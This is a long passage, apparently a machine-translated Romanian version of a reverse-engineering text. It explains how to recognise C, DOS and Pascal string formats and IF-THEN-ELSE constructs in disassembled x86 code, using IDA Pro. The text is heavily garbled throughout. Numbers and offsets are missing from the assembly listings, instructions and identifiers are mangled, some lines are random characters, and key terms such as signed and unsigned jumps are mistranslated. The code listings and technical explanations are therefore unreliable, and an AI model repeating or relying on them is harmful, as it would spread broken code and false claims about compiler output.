simbol de pensionare datează din acele vremuri străvechi, cândnicio interfață grafică nu a fost la vedere, iar terminalul consolei a fost considerat un sistem foarte avansat deinteracțiune cu utilizatorul Cheia nu a putut servi drept finisorul liniei, pentru că uneori trebuia să intru înmai multe linii în program simultan Combinațiile + + nu au fost, de asemenea, potrivite, deoarecemulte tastaturi din acei ani nu aveau astfel de chei!Pe de altă parte, calculatoarele au fost utilizate în principalpentru inginerie, și nu pentru așezări contabile, iar simbolul lui $ era cel mai mult simbol Acesta este motivul pentrucare s-a decis să-l utilizați pentru alarmă cu privire la finalizarea intrării de către utilizator, precum și casimbolul purtător de linie În prezent, șirurile DOS au ieșit aproape de utilizare, iar probabilitatea cu care văconfruntați cu ele este extrem de mică Pascal String Stroks Pascal nu au un simbol final-instead, ci sunt precedate deun câmp special care conține lungimea acestei linii Avantajele acestei abordări sunt posibilitatea stocării oricărorcaractere din linie, inclusiv zero octeți, precum și viteza mare de procesare a variabilelor de coarde În loc de overificare constantă a fiecărui octet pentru simbolul final, apare un singur apel la memorie - încărcarea lungimiiliniei Ei bine, deoarece lungimea liniei este cunoscută, puteți lucra nu cu octeți, ci în cuvinte duble-tipul „nativ” dedate ale procesoarelor pe de biți Întreaga întrebare este câți octeți să ia sub câmp Unu?Ei bine, economic, daratunci lungimea maximă a liniei va fi limitată la de caractere, ceea ce în multe cazuri nu este în mod clarsuficient!Acest tip de linii este utilizat de aproape toate compilatoarele Pascal (de exemplu, Borland Turbo Pascal,Pascal Free), astfel încât astfel de linii sunt numite „Pascal Stroki” sau, mai exact, șiruri scurte Pascal Delphi-String, realizând ridicolul evident al simbolurilor lungimii de șir Pascal , dezvoltatorii Delphi au extins câmpul dedimensiuni până la doi octeți, crescând astfel lungimea maximă posibilă la , de caractere Deși acest tip de liniieste susținut și de un alt compilator (de exemplu, Pascal Free), datorită tradiției predominante, este obișnuit să lenumim Delphi-Strings sau Pascal Strings cu un câmp cu două intit Șir Pascal Da, simbolul principal a fost introdus decătre utilizator și nu a fost adăugat de program, așa cum se întâmplă cu șirurile asciiz ale GPAV Identificarealiteralelor și liniilor Restricția kilobitei și „restricția ”Nu se întoarcepentru a numi limba În cea mai mare parte, liniile au o lungime mult mai mică, iar pentru prelucrarea unor tablouri dedate mari (fișiere text, de exemplu) există o grămadă (memorie dinamică) și o serie de funcții specializate Costurilecăzute (doi oficiali pentru fiecare variabilă șir) nu sunt atât de mari încât să le țină cont Într-un cuvânt, se pare afi cel mai convenabil și practic, combinând părțile mai bune ale C- și Pascal Șirurile largi ale Pascal-Stracks „largi”(șiruri de pascal larg) iau patru octeți pe câmp, „limitând” lungimea maximă posibilă de simboluri (~ GB), care depășește chiar și cantitatea de memorie din familia Windows Family Family Windows Este evidențiat pentru „uzpersonal” al procesului de cerere!Cu toate acestea, trebuie să plătiți scump pentru acest lux, oferind fiecărei liniipatru octeți „în plus”, dintre care trei cazuri vor fi pur și simplu goale Astfel, dacă lucrați cu adevărat cu liniiscurte, atunci costurile aeriene atunci când utilizați tipul larg-pascal vor crește pe nedrept Un poet în practică acesttip este rar utilizat Tipurile combinate de unii compilatori folosesc un tip combinat C+Pascal, care le permite, pe de oparte, să obțină o viteză de procesare a rândurilor înalte și să stocheze orice caractere în linii, iar pe de altăparte, să ofere compatibilitate cu un număr imens de C -Bibides concepute pentru a funcționa cu linii ASCLLZ Fiecarelinie combinată se încheie forțat cu zero, dar acest zero nu este inclus în linia în sine, iar bibliotecile (operatorii)cu normă întreagă ale limbii funcționează cu ea, ca și în cazul unui șir Pascal Când numiți funcțiile C-bibliotek,compilatorul le transmite indicatorul nu la adevăratul început al liniei, ci la primul său simbol Definiția tipului delinii după aspectul liniei este foarte dificil de determinat tipul acesteia Prezența zero finală la sfârșitul liniei nueste încă un motiv pentru a lua în considerare linia sa asciz (compilatoarele Pascal adaugă adesea unul sau mai multezerouri la sfârșitul liniilor pentru a alinia datele prin multiple de mai multe Adrese), iar coincidența liniei de momeală anterioară cu lungimea ei poate fi într -adevăr doar o coincidențăaleatorie Într -o aproximare nepoliticoasă, tipul de linie este determinat de genul compilatorului (C sau Pascal), darprecis - de algoritmul de procesare pentru această linie (adică, prin analizarea codului manipulant cu acesta) Luați înconsiderare un exemplu dat în lista Listarea Un exemplu care demonstrează identificarea ca liniile var so, si:string;Începe așa: = 'salut, marinar ';Sl: = 'salut, lume ';Dacă da = sl atunci writelnf'ok ') else wnteln (' woozl');Sfârşit După ce am compilat un exemplu din listarea Compilator Pascal gratuit, să ne uităm la segmentul dedate Acolo vom găsi următoarea linie (prospectul ) Partea III Identificarea structurilor cheie ale limbilor denivel înalt Linia „Hello, Worldt” într -un exemplu compilat din lista Data: Ahelloworld DB ODH,'Hello, World' ', ;DATA XREF: MAIN+ Bîo nu este, este foarte asemănător cu String-ul Asciz?Dacă nu știți ce compilatora compilat acest program, atunci nu s -a întâmplat niciodată nimănui că OXD este un câmp de lungime, nu un simbol detransfer!Pentru a verifica ipoteza noastră, urmărim legătura încrucișată, descoperită cu drag de IDA a RGO sau găsimindependent într -un text DizAssemble un operand direct x (deplasarea liniei), așa cum se arată în lista Listarea Operand direct (deplasarea liniei) găsită într -un text dezasamblat dintr -o listă de PushOffset S ;Transmitem indicatorul către Push Offset Ahelloworld "\ Rhello, World ";Transmitem indicatorul către linia delinie Push Offh;Apelul de lungime maximă a liniei FPC Shortstr Copy Deci, indicatorul la linie este transmis lafuncțiile FPC Shortstr Copy Din documentația atașată la Pascal liber, puteți afla că această funcție funcționează cușiruri scurte Pascal, prin urmare, OXD -ul de octeți nu este un simbol al transferului, ci lungimea liniei Ce am facedacă nu am avea nicio documentație despre Pascal gratuit?De fapt, este imposibil să obții absolut toțicompilatorii!Apropo, livrarea standard a IDA a RGO, până la versiunea incluzivă, nu conține semnătura biblioteciiFPP și trebuie create independent În cazurile în care funcția String nu este identificată sau nu există nicio descrierea acesteia, o cale este de a investiga codul pentru a clarifica algoritmul lucrării sale Ei bine, vom pune mânecile șivom începe?Luați în considerare codul dezasamblat al exemplului nostru (listarea ) Listarea Studiul codului dedezasamblare din Exemplul de listare pentru clarificarea algoritmului pentru operația sa FPC Shortstr copy Arg =DWORD PTR arg = DWORD PTR arg = DWORD PTR PUTH EBP EBP EBP ,;Deschide rama Stack PUSHA EAX PUSH ECX;Salvamregistrele CLD;Aruncăm steagul direcției, adică forța;Echipele LODS, STOS, MOVS cresc registrul de înregistrare mov edi,[ebp+arg ];Încărcăm valoarea argumentului Arg în registrul EDI;(deplasarea tamponului țintă) Proc aproape Cod xref:sub + viteză ;Lungimea maximă a liniei Och;Linia originală H;Linie țintă ESP ESI, [EBP+Arg ] GPAVA Identificarea literalelor și liniilor ;Încărcăm valoarea argumentului Arg în registrul ESI;(deplasarea linieiinițiale) Hog eah, eah;Numărul registrului EAX Mov ech, [ebp+arg ];Încărcăm valoarea argumentului arg în CE;(lungimeamaximă a liniei admisă) LODSB;Încărcăm primul octet al liniei sursă în Al, care indică;Registrul ESI și crește ESI peunitate Pa eah, esh;Comparați primul simbol al liniei cu lungimea maximă posibilă a liniei ;Este deja clar că primulsimbol al liniei este lungimea, cu toate acestea, vom pretinde că;Nu știm scopul argumentului arg și vom continuaanaliza JBE scurt LOC ;if (ESI [ ] #include char so [] ="Hello, World!";Char sl [] = hei lo, marinar! "; If (strcmp (& s [ ], & sl [ ])) printf (" woozlxn "); else printf(" ok \ n ");} lasă -ne să noi Compilați-l cu orice C-Compiler adecvat, de exemplu, Borland C ++ , și căutațiliniile noastre în segmentul de date Nu trebuie să căutăm mult timp, când sunt (listarea ) Atenție-MicrosoftVisual C ++ pentru compilarea acestui exemplu nu este potrivit! Motivele acestui lucru vor fi determinate în acestcapitol, în secțiunea „Iniția de tigru a variabilelor stokale” GPAV Identificarea literalelor și a liniilor Listarea S-string în datele segmentului de date: Date Ahelloworld: AHELLOSAILOR Date: Awoozl Data db 'Hello, World' ', db' Hello, Saillo! ', DB' Woozl ', Oah, db' OK '' , Oah, ; date xref: main+ îo; data xref: taip+ | despre; date xref: main+ fîo; date xref: taip+ , acordați atenție: liniile seapropie reciproc de cealaltă dintre ele se termină cu un simbol al zero, iar valoarea primului octet al liniei nucoincide cu lungimea sa Fără îndoială, suntem asciiz-string, suntem înaintea noastră DespreDNAKO nu interferează încăo dată pentru a verifica acest lucru, analizând cu atenție codul care manipulează cu aceștia (listarea ) - Listarea Recunoașterea șirului Aschz prin analizarea manipulării cu ei Main Proc în apropiere;Date xref: date: j pentru a merge la modulHex și ce vedem?Aici sunt - liniile noastre (listarea ) ■ Listarea L Linii Bună ziua, marinar!Și salut, lume!Însecțiunea de date la vizualizare I în modul hexadecimal Data: f f - f "Hello, World ' " Data: S F S - S F "Hello, Sailor" " Data: F S A - F V A " WOOZLB TOK "Hmm, de ce atunci i -a numărat Ida Pro cu cuvinteduble?Analiza codului care manipulează cu linii va ajuta la răspunsul la întrebare Cu toate acestea, înainte de acontinua cercetările sale, transformăm aceste cuvinte duble într-un șir normal Aschz În acest scop, faceți clic pe tasta pentru a converti cuvinte duble într -un lanț de octeți bestype, apoi cheia pentru a o converti într -olinie Apoi, lăsați cursorul la prima legătură încrucișată și apăsați tasta Codul dezasamblat al examinăriistudiate este prezentat în lista Listarea ls Analiza codului care manipulează cu linii pentru frunza ,compilată folosind Microsoft Visual C ++ Main Proc în apropiere C de xref: start+afslp var = byte ptr - oh var lc =dword ptr -ich var = dword ptr - h var = word ptr - h var = byte ptr - h var = byte ptr -dword ptr -dwordfoth -dword ptr - DWORD DWORD PTR - VAR = Word ptr - ;De unde au venit atât de multe variabile locale?Push EBP MOVEBP, ESP;Deschide rama Stack Sub esp, oh;Rezervăm memorie pentru variabile locale Mov eax, dword ptr ahelloworld;"SalutLume '"; Îl încărcăm în EAX nu, nu un indicator al liniei „Hello, World”, a;Primii patru octeți ai acestei linii 'sunt acumclar de ce;Ida Pro a greșit, iar codul original;(Înainte de a transforma linia într -o linie) arăta astfel :;MOV EAX,DWORD ;Nu este foarte clar?Și dacă, nu am studiat nu al nostru, ci;Un program extraterestru, acest truc alDizassemblerului ne -ar induce în eroare GPAVA Identificarea literelor și liniilor MOV DWORD PTR [EBP+VAR ],EAX;Copiați primii patru octeți ai liniei în variabila locală ѵAG Mov ech, dword ptr ahelloworld+ ;Încărcăm octeți dela a patra până la a opta linie „Hello, World ” în UE mov [ebp+var c], esh;Copiați -le într -o variabilă localăѵag s Dar știm deja ce este;Nu este o variabilă ѵag s, ci o parte a bufferului de șir Mov edx, dword ptrahelloworld+ ;Încărcăm octeți de la a opta până la a douăsprezecea linie „Hello, World ” în EDX mov [ebp+var ],edx;Copiați -le într -o variabilă locală ѵag , sau mai bine zis, într -un tampon de șir Mov tox, word ptrahelloworld+och;Încărcăm restul de două cozi de linie ale liniei în AH Mov [ebp+var ], ax;O scriem într -o variabilălocală ѵAG ;Deci, linia este copiată în părți din următoarele variabile locale :;int var ;int var „ c;intvar ;Scurt int var ;Prin urmare, de fapt, există o singură variabilă locală -;Char var „ [ ] Mov Ech, DWORD PTRAHELLOSAILOR;„Bună ziua, Sailor ”;Facem aceeași operație de copiere peste linie;"Hello, Sailor" "Mov DWORD PTR [EBP+VAR" ], ECX MOV EDX, DWORD PTR AHELLOSAILOR+ MOV [EBP+VAR "LC], EDX MOV EAX, DWORD PTR AHELLOSAILOR+ MOV [EBP+VAR ] ,Eax mov cx, word ptr ahellosailor+och mov [ebp+var „ ], cx mov dl, byte„ e mov [ebp+var ” ], dl;Copiați linia"Bună ziua, marinar!";În variabila locală Char ѵag „ [ ] LEA EAX, [EBP+VAR ];Încărcăm indicatorul la variabilalocală ѵAG în registrul EAX;care (după cum ne amintim) conține linia „Hello, Sailor”, împingeți EAH;const chaar*;Trimiteți funcțiile StrCMP ;Din aceasta putem concluziona că ѵag - păstrează cu adevărat linia ,;Nu este o valoarea tipului int Lea esh, [EBP+var „ ];Încărcăm indicatorul la variabila locală ѵAG în registru ,;Linia de stocare"Hello, World" " Partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicat împing ech;constchaar *;Trimiteți funcțiile SRTCMP Sunați la „Strcmp Adăugare ESP, ;Strcmp ("Hello, World!", "Hello, Sailor!") TestEAX, EAX JZ Short LOC B;Liniile sunt egale?;// ieșire pe linia liniei „Woozl” Push Offset Awoozl;„Woozl \ n” print”printf add esp, JMP scurt iOS- ;// Concluzie pe linia șirurilor „OK” LOC B: Cod xref: sub o+ a vitezede apăsare AOK;"OK \ n" CALL PRINTF ADD ESP, LOC " : C DE XREF: Sub + î: MOV ESP, EBP POP EBP;Închidețirama lui Stack Retn Endp principal Capitolul Identificarea IF - atunci - altfel există două tipuri de algoritmi -necondiționate și condiționate Procedura pentru algoritmul necondiționat este întotdeauna constantă și nu depinde dedatele de intrare De exemplu: A = B+S Procedura pentru algoritmi condiționali, dimpotrivă, depinde de datele deintrare De exemplu: dacă cu nu este zero, atunci: a = b/s;În caz contrar: pentru a afișa un mesaj de eroare "Atenție lacuvintele cheie evidențiate dacă, atunci și altfel, condițiile sau operatorii condiționali chemați de operatori Nu unsingur program nu este complet fără ei (exemple degenerate, cum ar fi lumea" - nu sunt nenumărate) Operatorii suntinima oricărui limbaj de programare Prin urmare, este extrem de important să le poți identifica corect În formăgenerală, fără a se aprofunda în detaliile sintactice ale limbajelor de programare individuale, operatorul condițieieste descris schematic după cum urmează: if (operator) (;; operator;} else (operator, (operator, operator, - operator;}Sarcina compilatorului este de a converti acest design în secvența comenzilor de mașină care operează operatoruloperatorului, dacă condiția este adevărată și , în consecință, operatorul, operatorul, dacă este fals Cu toate acestea,microprocesoarele din seria x susțin un set foarte modest de comenzi convenționale, care este de fapt limitat de osingură tranziție convențională (mai detaliat problema excepțiilor va fi Considerat în continuare înAcest capitol, însecțiunea „Optimizarea ramurilor”) Programatorii care sunt familiarizați doar cu IVM Rs, o astfel de restricție nu vapărea nefirească, între timp, există o mulțime de procesoare care susțin prefixul implementării condiționate ainstrucțiunilor Adică, în loc să scrie: teste, ESH/JNZ XXX/MOV EAX, x , fac acest lucru: Test Ecx, Ecx/Ifz Mov EAX, x IFZ - Acesta este prefixul de execuție condiționată, permițând următoarea comandă numai dacă este instalat steagulzero În acest sens, microprocesoarele x pot fi comparate cu dialectele timpurii ale limbajului de bază, nu Toți ceilalți operatori, cu excepția SOTO, care ne permit să folosim în expresii condiționate Comparați cele douăversiuni ale aceleiași expresii condiționate prezentate în lista L LISTARE, variante de aceeași expresiecondiționată în dialectele noi și vechi noi dialecturi noi de bază vechi de bază dacă a = in thy then prin "a = b" Dacă a = în goto goto printț "a = B " // Alt cod de program, dacă ați programat vreodată pe vechiledialecte de bază, atunci vă amintiți probabil că este mult mai profitabil să vă conformați cu operatorul Soo, dacăcondiția este falsă și, în caz contrar, continuați Partea III Identificarea structurilor cheie alelimbilor de nivel înalt Execuția normală a programului După cum puteți vedea, contrar opiniei comune, abilitățile deprogramare pe de bază nu sunt în niciun caz inutile, în special în domeniul programelor Majoritatea compilatorilor(chiar și non -optimizant) inversează adevărul condițiilor, traducerea IF (condiție} (operator operator ) la următorulpseudo -cod (listarea ) : Listarea Pseudo -cod, generat de un tipic compilator bazat pe TF - Atunci dacă (nucondiție) continuă să continue operatori / operatori; continuă: prin urmare, pentru a restabili textul inițial alprogramului, va trebui să inversați din nou condiția și să „ridicat” blocul operatorilor ( operator operator ] lacuvântul cheie atunci Listarea Pseudo -codul, generat pe baza proiectării сhggzag "ttzh (pmxwțk \ l d '\ l' x;; g'ts d y' gi l 'l! dacă print a = b" // alt cod de program, pe de altă parte, dacă programatorul, dimpotrivă,a verificat variabilele A și B pentru inegalitate (dacăȘi <> în atunci prin "a <> in"), compilatorul încă inverseazăadevărul condiției și generează codul prezentat în lista - Listarea Codul generat de compilatorul deproiectare: dacă strigă de atunci prin „AOS” prin „AOS” // alt cod de program Desigur, compilatorii care suferă deverbositate Acestea sunt ușor recunoscute prin tranziția necondiționată, ulterior imediat după operatorul condiționat(listarea ) Listarea Codul generat de compilatorii care nu inversează starea în proiectarea de F-Teen If(condiție} Do Go Goto continuă; operator ;; operator; continuă: în acest caz, inversarea condiției nu este necesară Cutoate acestea, dacă acest lucru se face, nu se va întâmpla nimic groaznic, cu excepția cazului în care codul programuluiva deveni mai puțin de înțeles și chiar nu întotdeauna GPAVA Identificarea IF - atunci - altfel de modele valua în considerare modul în care designul complet al IF (condiție) th, {{ operator ”,} else {operator operator,} Așa cumse arată în lista , unii compilatori inversează adevărul condițiilor, în timp ce celelalte nu sunt starea lui If{condiție) operatorul altfel sucursală;Opera Tors Goto continuă do it: // Vetsk dacă operatorul operator;Continuați:Opțiune cu inversarea condiției dacă (nu condiție) altfel // ramură dacă operatorul;Operator;Goto continuă altceva: //Velse Velse Operator;Continuați operatorul: Prin urmare, fără a ști „dispoziția” compilatorului, este imposibil să sestabilească cum arăta textul sursă autentic al programului Totuși, acest lucru nu creează probleme, deoarece stareapoate fi întotdeauna înregistrată, deoarece este convenabilă Să presupunem că dacă nu vă place designul dacă a = b/celse Prinse prin „eroare”, scrieți -l astfel: dacă (c == ), atunci prin „eroare” altfel a = b/c, și nu vor apăreaprobleme !Tipurile de condiții sunt împărțite în simple (elementare) și complexe (componente) Un exemplu de condițiesimplă este dacă (a == b) , în timp ce un exemplu de condiție dificilă poate arăta astfel: dacă ((a == b) && (ai = )) este evident că orice complex, starea poate fi stabilită în mai multe condiții simple Prin urmare, vom începecu condiții simple Există două tipuri principale de condiții elementare: □ condițiile relațiilor sunt „mai puțin”,„egale”, „mai mult”, „mai puțin sau egale”, „nu sunt egale”, „mai mult sau egale”, respectiv desemnate ca: , = □ Condiții logice - și (a), sau (sau), nu (nu), excluzând sau (xor), în notări ale limbii, respectiv desemnateca, |, ', p Notă de către cunoscuta autoritate de hacker Matt Pitrek include în această clasificare și testareabițiilor, dar un pic incorect amestecați diferite concepte într-o singură grămadă, chiar dacă sunt interconectate dacăcondiția este cu adevărat, returnează valoarea Bulevsky a True, respectiv , dacă condiția este falsă, returneazăvaloarea falselor Reprezentarea internă (fizică) a variabilelor Bulevsky depinde de implementarea specifică Conformacordului general acceptat, Falsul este zero, dar adevărat nu este egal cu zero Adesea (dar nu întotdeauna), este egal cu unul, dar acest lucru nupoate fi bazat!Prin urmare, codul if ((a> b)! = ) este absolut corect, iar opțiunea dacă ((a> b) == l) estelegată de o implementare specifică și, prin urmare, nedorită Vă rugăm să rețineți: designul dacă ((a> b) і = ) verifică inegalitatea la zero în niciun caz în niciun caz valorile variabilelor în sine A și B, și anume rezultatulcomparației lor Luați în considerare următorul exemplu: if ((bbb == ) == ) printf ("woozl!") Ce credeți că va fiafișat pe ecran dacă îl rulați?Așa este - Woozl I De ce?La urma urmei, nici , nici nu sunt zero!Da, dar până laurmă, '= , ceea ce înseamnă că starea (BBB == ) este falsă și, prin urmare, este zero Apropo, Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt, dacă este înregistratădacă ((a = b) == o) , obțineți un rezultat complet diferit - valoarea variabilei va fi atribuită variabilei a, dupăcare aceasta este testat pentru egalitate zero Condițiile logice sunt cel mai adesea utilizate pentru a lega două saumai multe condiții elementare ale relației în constituent De exemplu, dacă ((a == b) && (a '= )) Când difuzațiprogramul, compilatorii efectuează întotdeauna o scanare a condițiilor compozite în Simple (listarea ) În acest caz,acest lucru se întâmplă în acest fel: dacă a == b thr dacă a = o atunci la a doua etapă, se efectuează înlocuireaoperatorilor condiționali cu operator SOTO Listarea Extinderea componentelor în simplă atunci când difuzăm dacă a'= b, apoi continuă dacă a == apoi continuă // codul condiției: Continuați // alt cod pentru calcularea condițiilorelementare în expresie dificilă depinde de capriciile compilatorului , este garantat doar că condițiile, condițiile,„înrudite” prin funcționarea logică și sunt verificate de la stânga la dreapta în ordinea anunțurilor lor în program Maimult, dacă prima condiție este falsă, atunci condiția care urmează nu va fi calculată* Acest lucru face posibilăscrierea unui cod ca următoarele: if ((nume de fișier) & (f = fopen (& filiname [ ], "rw"))) " - Dacă indicatorul defișiere indică o zonă neexplorată de Memoria (adică, pur și simplu PUT conține zero - false logice), atunci funcțiaFOPEN nu este cauzată, iar prăbușirea acesteia nu are loc Această metodă de calcul se numește operațiuni de pomparerapidă Acum vom apela la problema identificării condițiilor logice și analiza expresiilor complexe Să revenim laexpresia if ((și == b) && (a '= )) și aruncăm o privire asupra rezultatului difuzării sale (listarea ) Listarea , rezultatul a difuzării expresiei dacă ((a == b) && (aó " )) " "Dacă a '= b atunci continuați dacă a == , atunci continuați' / / Cod de condiție !: Continuați (ai "o)) Opțiunea Opțiunea Dacă a == B atunci do it ip a == b teen do it - dacă a '= atunci do it '' '' 'Dacă a == ,atunci continuați- Goto continuă !: do lt: do lt! b este un ?JA Jnbe iconic ?== Din jg jnle a> = b este ilegal? ?Jae JNB JNC este semnificativ??== din jge jnl a B == I SZ == JNBE # x == a = ; SZ == = JNA # x == Iatăstânga, iar B este operandul drept al echipei de comparație a valorilor materiale din aceasta, pentru a analizarezultatul comparației numerelor materiale, este imposibil de utilizat iconic Tranziții condiționate (JL, JG, JLE, JNL,JNLE, JGE, JNE JNGE)!Ei lucrează cu steagurile semnului și revărsării, prin urmare, dacă în loc de steagul semnului,acestea sunt alunecate de steagul realizării coprocesorului, iar steagul de revărsat este lăsat în starea „suspendată”,apoi condiționată Tranziția nu va funcționa așa cum doriți!Folosiți doar instrucțiunile de tranziție rușinoase - JE, JB,JA și așa mai departe (vezi Tabelul ) Desigur, acest lucru nu înseamnă că este imposibil să se compare semnificațiimateriale iconice Acest lucru se poate face, dar pentru a analiza rezultatele comparației, este întotdeauna necesar săse utilizeze întotdeauna doar tranzițiile condiționate nerușinate!Astfel, structura materială dacă (condiție elementarăpentru atitudine) DO IT este difuzată într -una dintre următoarele secvențe ale instrucțiunilor procesorului: (Listarea ) ;Listarea Rezultatul difuzării structurii materialului dacă (condiție elementară pentru relație) OpțiuneaDOJT fld [a] fcomp [b] fnstsw ax sahf do it opțiunea fld fcomp fnstw test jnz [a] [b] ah, bit mask do it este maivizibil, dar al doilea funcționează mai repede Cu toate acestea, un astfel de cod poate genera doar Microsoft Visual C++ Borland C ++ și VATCOM Lauding C sunt experimentate de instrucțiunile SAHF, care provoacă frâne mici, dar simplificăextrem de mult analiza codului La urma urmei, după ce am întâlnit o echipă precum JNA, vom spune, de asemenea, cătranziția este executată, partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt atunci când A b extrem de cf == && zf == setg setnle semnificativ zf == && sf == din setnc setnc a> = b> = b> = b> = B> = b> = b> = b> = b> = b> = b> = b> = b> = b> Extrem de cf == setge setnl semnificativ sf = = din setb setc setnae a B tot Cf == && Zf == Cmovg Cmovnle Remark Zf == f Cmovae CmovncCmovnb A> = B Eastrous CF == Cmovnl Signal SAF == f Cmovb Cmovc Cmovnae a )? : - ;( ) Gpava IDENȚIASTRUCTURILOR IF - atunci - else dacă (b> ) // ramificarea b = l;Else b = -l;Returnează A+B;} Dacă săriți acestprogram prin intermediul compilatorului Microsoft Visual C ++, atunci la ieșire codul prezentat în lista va fiprimit - Listarea L Rezultatul compilării exemplului dat în lista push ebp mov ebp, esp;Deschide rama Stack Subesp, ;Rezervăm un loc pentru variabile locale ;// operator condiționat?;Începutul unui operator condiționat?Hog eah,eah;Numărul EAH CMP [EBP+VAR A], O;Comparați variabila A cu zero Setle al;Puneți valoarea x în Al dacă ѵag a Dec eAX;Reduceți EAX pe unitate ;Acum, dacă ѵag a> , atunci eAx: =- ;Dacă ѵag a ,;If var a , atunci eax: = ;If ѵag a " mov[ebp+var b], ;Înregistrare în variabila var b JMP Short continuă;Trecerea la marca continuă ;Sucursală "var b> "altfel :;Cod xref: main+ldîj mov [ebp+var b], offffffffffh;Scriem valoarea - în variabilă var b Continua : Cod xref: main+ viteză;Sfârșitul ramurii IF -Teen -Else ;Acordați atenție-reprezentarea ramificării „if-teen -else” estemult;Mai compact decât un operator condiționat "?", Cu toate acestea, conține condiționate;Tranziții care reducsemnificativ performanța programului MOV EAX, [EBP+VAR A];Încărcăm valoarea variabilei ѵag a în EAX Adăugați eax,[ebp+var b];Îndoiți valoarea variabilei ѵag a cu valoarea variabilei ѵag y;Și plasăm rezultatul în EAX Mov ESP, EBP POPEBP;Închideți rama lui Stack Retn Astfel, vedem că este imposibil ca a priori să spunem că rezultatul difuzăriioperatorului condiționat?Este întotdeauna echivalent cu rezultatul difuzării structurii IF-Ten-Yelse Cu toate acestea,același Microsoft Visual C ++ în modul de optimizare agresivă în ambele cazuri generează un cod identic (lista ) Listarea Rezultatul difuzării exemplului din listarea compilează Microsoft Visual C ++ în modul deoptimizare agresivă Main Proc lângă Push ECX;Rezervăm un loc pentru variabilele locale A și B ;Deoarece nu suntniciodată folosite împreună, ci doar alternativ ,;Compilatorul le plasează într -o singură celulă de memorie Mov edx,[esp+ ];Echipa N Operator?;Încărcare în EDX Variabila A Hog eah, eah;Echipa N Operator?;Numărul EAH ;Deoarece echipaSetle AL schimbă doar conținutul AL;Cozi în restul registrului, trebuie să -l curățăm pe cont propriu GPAVA INDENTIIIF - atunci - Else Test Edx, EDX;Echipa N a operatorului?;Verificarea variabilei și pentru egalitate zero Mov edx,[esp+ ];comanda n ramificare dacă;Încărcare în variabila edx b Setle al;Echipa N Operator?;Puneți valoarea x în Aldacă a Dec eAX;Echipa N Operator?;Reduceți EAX pe unitate ;Acum,dacă a> , atunci Eax: = - ;Dacă a ,atunci eax: = ;Dacă a , atuncieah: = ;Dacă a Dech;comanda n ramură dacă;Reduceți Ech pe unitate ;Acum, dacă b> , atunci esh: = - ;dacă b , atunci esh: = ;dacă b , atunci esh: = - ;Dacă b )? "Sailor": "World ");} Încercați să realizați în mod compact acest lucrucu ajutorul ramurilor! Dar, de fapt, aceasta este doar o comoditate externă, iar compilatorul difuzează Exemplul dateste așa cum se arată în lista Lista Un exemplu din lista după Broadcast Main () {static char so []= "Sailor" static char sl [] = "world";if (a> ) p = deci;Altceva p = sl;Printf ("salut, %s \ n", p);Squet Up atâtlistarea, cât și DizAssemble fișierele rezultate - acestea trebuie să fie identice Astfel, atunci când decompilareaprogramelor pe C/C ++, în general, este imposibil de spus dacă în ele a fost utilizat ramificator sau operatorcondiționat Cu toate acestea, există încă unele indicii care ajută la restabilirea adevăratului tip de text sursă înanumite cazuri De exemplu, este puțin probabil ca programatorul să -și construiască listarea, așa cum se arată înultimul exemplu De ce să introducem variabile statice și într -un mod complex pentru a manipula cu un indicator dacă, înloc să se ramifice, este mult mai ușor să folosești un operator condiționat?Astfel, dacă operatorul condiționat mergefără probleme în programul decompilat, iar ramificarea pare artificială, este evident că operatorul condiționat a fostutilizat în textul original și nu ramificarea Notă echipele Cental - cheia identificării tipurilor Întrucât analizarezultatului comparației dintre variabilele cu semn și unisk este realizată de diferite grupuri de instrucțiuni, deexemplu, puteți distinge cu încredere și fără echivoc INT -urile semnate de INT -ul nesemnat Caracteristicile echipelorde tranziție condiționată în modul pe biți sunt una dintre caracteristicile neplăcute ale modului pe biți este oechipă limitată „pe termen lung” de tranziție condiționată În efortul de a obține o compactitate ridicată a codului,dezvoltatorii microprocesorului au luat un singur octet la adresa țintă, limitând astfel lungimea în GPAVA Identificarea IF - Theen - Else Terval octeți Aceasta este tranziția atât de scurtă (scurtă), adresată de odeplasare a semnului relativ, contorizată de la început, urmând comanda comenzii comenzii (Fig ) O astfel de schemăde adresare limitează lungimea saltului înainte (adică „jos”) doar de octeți și „înapoi” (adică „sus”) și chiar maipuțin - (din cauza a ceea ce este necesar în acest caz „Cross” și „Cross” și The Echipa de tranziție) Acesterestricții sunt lipsite de vecinul (aproape) o tranziție necondiționată abordată de doi octeți și care acționează înîntregul segment : STSZS PP : JE : ZSSO [Hog - - = : SZ- Retn : B / TOC A: SZ Retn AH, о Own-AH, BX AX, -* Fig Reprezentarea internă a tranzițieiscurte (scurte) scurte tranziții complică difuzarea sucursalelor - până la urmă, nu orice adresă țintă se află în deocteți!Există multe modalități de a evita această restricție Vom lua cel mai popular: dacă traducătorul vede că adresațintă depășește atingerea tranziției condiționate, aceasta inversează starea operației și face un scurt (scurt) Trecerea la eticheta continuă și la eticheta DO IT transferă controlul de tranziția apropiată (aproape) care acționeazăîn același segment (Fig ) SMR A, în JX do it - Continuați: "// I // Foarte g // multe ® // cod in // * do it: smr a, în condițiile de inversare jn t Continuare -jmp do it - Continuă:^-// // foarte // // // do it: O scurtă tranziție condiționată este mult cod Tranziția aproape necondiționată acționează în interior Întregulsegment al Fig Transmiterea tranzițiilor scurte într -un mod similar poate fi eliminată în acele situații atuncicând adresa țintă este localizată într -un segment complet diferit - este suficient pentru a înlocui tranziția aproapenecondiționată la una îndepărtată Spre marea fericire a dezvoltatorilor compilatorilor (și nu mai puțin bucuriahackerilor), programele de dizassembleing, într-un mod pe de biți, tranziția condițională „lovește” în întregulspațiu de abordari cu patru hogabyta și toate aceste probleme dispar PARTEA III Identificarea structurilor cheieale limbilor de nivel înalt exemple practice și acum pentru o mai bună înțelegere a materialului prevăzut în acestcapitol, să ne uităm la mai multe exemple „vii” care sunt compilate de diverși compilatori Să începem prin studierearelațiilor întregi elementare (listarea ) Listarea Un exemplu de studiu al relațiilor întregi elementare#include main () {int a;int b;if (a b) printf ("a> b");if (a == b) printf ("a ==b");if (a '= b) printf ("a = b");if (a> = b) printf ("a> = b");if (a = var b, atunci tranziția să continue, altfel - sigiliul liniilor;Vă rugăm să rețineți că codul original arătaastfel :;if (a var b Atunci codul sursă al programului ar trebui să arate astfel: (a> b) printf ("a> b");Apăsați apelul AdăugațiOffeset AAV ;"A> B" PNNTF ESP, LOC :;Cod xref: main+ îj mov edx, [ebp+var a];Încărcăm valoarea 